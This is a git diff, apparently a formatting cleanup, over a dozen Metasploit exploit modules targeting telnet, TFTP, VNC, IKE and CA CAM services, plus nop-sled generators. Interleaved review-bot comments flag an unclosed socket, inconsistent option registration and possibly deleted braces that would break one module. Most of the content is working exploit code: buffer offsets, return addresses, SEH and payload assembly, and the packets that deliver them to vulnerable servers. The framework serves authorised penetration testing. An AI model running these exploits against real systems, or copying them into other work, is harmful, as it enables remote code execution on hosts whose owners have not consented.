@@ -3,118 +3,116 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - def initialize(info = {}) - super(update_info(info, + def initialize(info = {}) + super(update_info(info, 'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow', 'Description' => %q{ - This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. - Other versions may also be affected. The service terminates after exploitation, - so you only get one chance! + This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. + Other versions may also be affected. The service terminates after exploitation, + so you only get one chance! 
}, 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], - 'Arch' => [ ARCH_X86 ], + 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => - [ - [ 'CVE', '2000-0665'], - [ 'OSVDB', '373'], - [ 'BID', '1478'], - [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'], - ], - 'Privileged' => false, + [ + [ 'CVE', '2000-0665'], + [ 'OSVDB', '373'], + [ 'BID', '1478'], + [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'], + ], + 'Privileged' => false, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => - { + { 'Space' => 1000, 'BadChars' => "\x00\x0a", 'StackAdjustment' => -3500, }, 'Platform' => ['win'], 'Targets' => - [ - [ - 'Windows 2000 Pro SP0/4 English REMOTE', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 1886, - } + [ + [ 'Windows 2000 Pro SP0/4 English REMOTE', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 1886, + } + ], + + [ 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 3318, + } + ], + + [ 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 3358, + } + ], +=begin + [ 'Windows XP Pro SP0/1 English', + { + 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL + 'Offset' => 2600, # this is made up and absolutely wrong ;-) + } + ], +=end ], - [ - 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 3318, - } - ], - [ - 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 3358, - } - ], - #[ - #'Windows XP Pro SP0/1 English', - #{ - # 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL - # 'Offset' => 2600, # 
this is made up and absolutely wrong ;-) - #} - #], - #[ - ], - 'DisclosureDate' => 'Jul 17 2000', + 'DisclosureDate' => 'Jul 17 2000', 'DefaultTarget' => 0)) - - register_options( + + register_options( [ Opt::RPORT(23), ], self.class) end - def check + def check connect print_status("Attempting to determine if target is vulnerable...") sleep(7) banner = sock.get_once(-1,3) if (banner =~ /TelSrv 1\.5/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit - print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") + print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") connect print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep. - sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. + sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. username = rand_text_english(20000, payload_badchars) seh = generate_seh_payload(target.ret) username[target['Offset'], seh.length] = seh - + print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...") sock.put(username) sleep(0.25) - print_status('Exploit sent...') + print_status('Exploit sent...') handler disconnect end diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 8b04d96384..fa2764e96b 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb 
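Review bot: `check`, re-indented here as `+ def check`, calls `connect` and then returns `Exploit::CheckCode::Vulnerable` or `Exploit::CheckCode::Safe` without ever calling `disconnect`, so every check leaves its socket open, whereas `exploit` in the same hunk does call `handler` and `disconnect`. Since the commit already rewrites the method, add `ensure` and `disconnect` ahead of the method's closing `end`; whether `disconnect` tolerates a `connect` that raised should be confirmed against the Tcp mixin before relying on the `ensure`. The new `=begin`/`=end` block inside the `'Targets'` array only works because both markers sit at column 0, which deserves a one-line note such as `# =begin/=end must stay at column 0 or the block is parsed as code` so a later re-indent does not break it.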
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Seh - + include Msf::Exploit::Remote::Seh + def initialize(info = {}) super(update_info(info, 'Name' => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in GoodTech Systems Telnet Server - versions prior to 5.0.7. By sending an overly long string, an attacker can + This module exploits a stack overflow in GoodTech Systems Telnet Server + versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, 'License' => MSF_LICENSE, @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 400, @@ -47,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], @@ -56,7 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 15 2005', 'DefaultTarget' => 0)) - register_options([ Opt::RPORT(2380) ], self) + register_options( + [ + Opt::RPORT(2380) + ], self.class) end def exploit diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 408e737989..cc797be62e 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb 
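Review bot: The rewritten call `register_options( [ Opt::RPORT(2380) ], self.class)` changes the owner argument from `self` to `self.class`, which goes beyond the whitespace cleanup the rest of this commit performs and is not applied consistently: the dlink_long_filename, tftpd32_long_filename and tftpdwin_long_filename hunks keep `], self)`. If `self.class` is the intended form (it matches the freeftpd, freesshd and futuresoft hunks and is, as far as I recall, the framework's default owner), apply it to those three as well; otherwise keep `self` here so the commit stays whitespace-only. Either way a behavioural change like this belongs in the commit message.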
+++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -21,17 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in D-Link TFTP 1.0. - By sending a request for an overly long file name, an attacker - could overflow a buffer and execute arbitrary code. For best results, - use bind payloads with nonx (No NX). + By sending a request for an overly long file name, an attacker + could overflow a buffer and execute arbitrary code. For best results, + use bind payloads with nonx (No NX). }, - 'Author' => [ - 'LSO <lso[@]hushmail.com>', # Exploit module - 'patrick', # Refs, stability, targets etc - ], + 'Author' => + [ + 'LSO <lso[@]hushmail.com>', # Exploit module + 'patrick', # Refs, stability, targets etc + ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2007-1435' ], [ 'OSVDB', '33977' ], [ 'BID', '22923' ], @@ -44,14 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1024, 'BadChars' => "\x00", - 'Compat' => + 'Compat' => { 'ConnectionType' => '-reverse', }, }, 'SaveRegisters' => [ 'ecx', 'eax', 'esi' ], 'Platform' => 'win', - + 'Targets' => [ # Patrick tested OK 20090228 @@ -62,8 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 12 2007', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(69)], self) - + register_options( + [ + Opt::RPORT(69) + ], self) end def exploit 
@@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - juju = "\x00\x01" + juju = "\x00\x01" juju << Rex::Text.rand_text_alpha_upper(581) juju << Rex::Arch::X86.jmp_short(42) juju << Rex::Text.rand_text_alpha_upper(38) juju << [target.ret].pack('V') + payload.encoded - + udp_sock.put(juju) handler @@ -84,4 +87,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 36006eeaeb..704d0d309a 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -23,18 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow', 'Description' => %q{ - This module exploits a stack overflow in the FutureSoft TFTP Server + This module exploits a stack overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able - to overwrite both the SEH and the saved EIP. A subsequent write-exception - that will occur allows the transferring of execution to our shellcode + to overwrite both the SEH and the saved EIP. A subsequent write-exception + that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This module has been tested against Windows - 2000 Professional and for some reason does not seem to work against + 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all). }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2005-1812'], ['OSVDB', '16954'], ['BID', '13821'], @@ -51,23 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, - 'Platform' => 'win', - 'Targets' => [ ['Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4} ], # ws2help.dll ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll ['Windows NT SP5/SP6a English', { 'Ret' => 0x776a1799} ], # ws2help.dll ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638} ], # PEB return - ], - 'Privileged' => true, - 'DisclosureDate' => 'May 31 2005')) - register_options( + register_options( [ Opt::RPORT(69) ], self.class) diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 466acb542c..230592295e 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb 
@@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -11,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Quick FTP Pro 2.1 Transfer-Mode Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Quick TFTP Pro server + This module exploits a stack overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. This is a port of a sploit by Mati "muts" Aharoni. }, 'Author' => 'Saint Patrick', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2008-1610'], ['OSVDB', '43784'], ['BID', '28459'], @@ -34,20 +44,16 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, - 'Platform' => 'win', - 'Targets' => - [ + [ ['Windows Server 2000', { 'Ret' => 0x75022AC4} ], #ws2help.dll ['Windows XP SP2', {'Ret' => 0x74D31458} ], #oledlg.dll ], - 'DefaultTarget' => 1, - 'DisclosureDate' => 'March 27 2008')) - register_options( + register_options( [ Opt::RPORT(69) ], self.class) diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index c6a1b4e58b..52e93d05b4 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TFTPD32 <= 2.21 Long Filename Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in TFTPD32 version 2.21 + This module exploits a stack overflow in TFTPD32 version 2.21 and prior. By sending a request for an overly long file name to the tftpd32 server, a remote attacker could overflow a buffer and execute arbitrary code on the system. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2002-2226'], + 'References' => + [ + ['CVE', '2002-2226'], ['OSVDB', '45903'], ['BID', '6199'], ], @@ -46,26 +44,21 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ ['Windows NT 4.0 SP6a English', { 'Ret' => 0x77f9d463} ], - ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663} ], - ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0} ], - ['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527} ], + ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663} ], + ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0} ], + ['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527} ], ], - 'Privileged' => true, - 'DisclosureDate' => 'Nov 19 2002' - )) - register_options( - [ - Opt::RPORT(69) - ], self) - + register_options( + [ + Opt::RPORT(69) + ], self) end def exploit 
@@ -73,18 +66,18 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - sploit = - "\x00\x01" + - rand_text_english(120, payload_badchars) + + sploit = + "\x00\x01" + + rand_text_english(120, payload_badchars) + "." + - rand_text_english(135, payload_badchars) + + rand_text_english(135, payload_badchars) + [target.ret].pack('V') + - payload.encoded + + payload.encoded + "\x00" - + udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 5f25f1e3bb..5a3ffb6a00 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -22,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow', 'Description' => %q{ - This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending + This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten. }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-4948' ], [ 'OSVDB', '29032' ], [ 'BID', '20131' ], 
@@ -47,17 +45,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en + # Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en [ 'Universal - tftpd.exe', { 'Ret' => 0x00458b91 } ] # pop edx / ret tftpd.exe ], 'Privileged' => false, 'DisclosureDate' => 'Sep 21 2006', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(69), - ], self) + register_options( + [ + Opt::RPORT(69), + ], self) end def exploit @@ -67,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "\x00\x02" + payload.encoded + [target['Ret']].pack('V') sploit << "netascii\x00" # The first null byte is borrowed for the target return address :) udp_sock.put(sploit) - + disconnect_udp end diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index b40e011e01..4f0f32c785 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -22,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => '3CTftpSvc TFTP Long Mode Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in 3CTftpSvc 2.0.1. By + This module exploits a stack overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-6183'], ['OSVDB', '30758'], ['BID', '21301'], @@ -55,21 +53,20 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 27 2006')) - register_options([Opt::RPORT(69)], self.class) - + register_options([Opt::RPORT(69)], self.class) end def exploit connect_udp sploit = "\x00\x02" + rand_text_alpha_upper(1) + "\x00" + make_nops(73) - sploit << payload.encoded + [target.ret].pack('V') + make_nops(25) + "\x00" + sploit << payload.encoded + [target.ret].pack('V') + make_nops(25) + "\x00" print_status("Trying target #{target.name}...") - + udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 322f05c622..e5075121dd 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb 
@@ -3,30 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'CA CAM log_security() Stack Overflow (Win32)', 'Description' => %q{ - This module exploits a vulnerability in the CA CAM service + This module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. This module has been tested on Unicenter v3.1. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -43,9 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1024, 'BadChars' => "\x00", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ # W2API.DLL @ 0x01950000 - return to ESI ['W2API.DLL TNG 2.3', { 'Platform' => 'win', 'Ret' => 0x01951107 }], @@ -65,26 +61,26 @@ class Metasploit3 < Msf::Exploit::Remote connect ack = sock.get_once disconnect - - (ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe + + (ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe end - + def exploit connect - + ack = sock.get_once if (ack != "ACK\x00") print_status("The CAM service is not responding") end - + buf = rand_text_english(4096, payload_badchars) - + # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI buf[ 1016, 4 ] = [target.ret].pack('V') - buf[ 1052, payload.encoded.length ] = payload.encoded + buf[ 1052, payload.encoded.length ] = payload.encoded sock.put("\xfa\xf9\x00\x10" + buf + "\x00") - + handler disconnect end 
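Review bot: The `},` that closes the `%q{` description in the `@@ -3,30 +3,27 @@` hunk, and the `},` after `'StackAdjustment' => -3500,` in the `@@ -43,9 +40,8 @@` hunk, appear only as removed lines, and the hunk counts (30 to 27 and 9 to 8) match a net deletion rather than a re-indent. If those lines were really dropped, the description literal and the `'Payload'` hash are left unterminated and `cam_log_security.rb` will not parse; if this is a rendering artifact of the collapsed listing, a `ruby -c` on the new file settles it. Both hunks sit inside `initialize`, whose body extends beyond them.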
diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 6208cb2dd5..a4865ecbfe 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -25,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2001-0167' ], [ 'OSVDB', '6281' ], [ 'BID', '2305' ], @@ -54,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index f340bdb3eb..a63cbe1745 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -26,8 +24,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-1652' ], [ 'OSVDB', '24456' ], [ 'BID', '17378' ], @@ -55,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 5d918a2484..44c9e1fd64 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SafeNet SoftRemote IKE Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Safenet SoftRemote IKE IreIKE.exe + This module exploits a stack overflow in Safenet SoftRemote IKE IreIKE.exe service. When sending a specially crafted udp packet to port 62514 an attacker may be able to execute arbitrary code. This module has been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using - windows/meterpreter/reverse_ord_tcp payloads. + windows/meterpreter/reverse_ord_tcp payloads. }, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2009-1943' ], [ 'OSVDB', '54831' ], [ 'BID', '35154' ], 
@@ -53,14 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 1 2009', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(62514)], self) - + register_options([Opt::RPORT(62514)], self) end def exploit connect_udp - + sploit = [0x01000000].pack('V') # IPC packet sploit << [0x00000033].pack('V') # Exploit this thing using command 0x11 (0x33 - 0x28). sploit << payload.encoded @@ -71,9 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote udp_sock.put(sploit) sleep(5) - handler + handler disconnect_udp - + end end diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 3cf163a7df..996d8d8026 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -42,11 +42,11 @@ class Metasploit3 < Msf::Nop def generate_sled(length, opts) - + badchars = opts['BadChars'] || '' random = opts['Random'] || datastore['RandomNops'] - nops = [ + nops = [ 0xe1a01001, 0xe1a02002, 0xe1a03003, @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Nop 0xe1a0a00a, 0xe1a0b00b ] - + if( random and random.match(/^(t|y|1)/i) ) return ([nops[rand(nops.length)]].pack("V*") * (length/4)) end diff --git a/modules/nops/nop_test.rb.ut.rb b/modules/nops/nop_test.rb.ut.rb index fbbcf05468..3dd48800d5 100644 --- a/modules/nops/nop_test.rb.ut.rb +++ b/modules/nops/nop_test.rb.ut.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index e6574d7fda..c8d62e0324 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -37,4 +37,4 @@ class Metasploit3 < Msf::Nop " " * length end -end \ No newline at end of file +end diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 0f63e94ac0..6015022c60 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -42,30 +42,30 @@ class Metasploit3 < Msf::Nop def generate_sled(length, opts) - + badchars = opts['BadChars'] || '' random = opts['Random'] || datastore['RandomNops'] - + if( random and random.match(/^(t|y|1)/i) ) 1.upto(1024) do |i| regs_d = (rand(0x8000 - 0x0800) + 0x0800).to_i regs_b = [regs_d].pack('n').unpack('B*')[0][1, 15] flag_o = rand(2).to_i flag_r = rand(2).to_i - + pcword = ["011111#{regs_b}#{flag_o}100001010#{flag_r}"].pack("B*") failed = false - + pcword.each_byte do |c| failed = true if badchars.include?(c.chr) end - + next if failed - + return (pcword * (length / 4))[0, length] end end - + return ("\x60" * length)[0, length] end diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 44dc3629dd..023c7f6680 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # 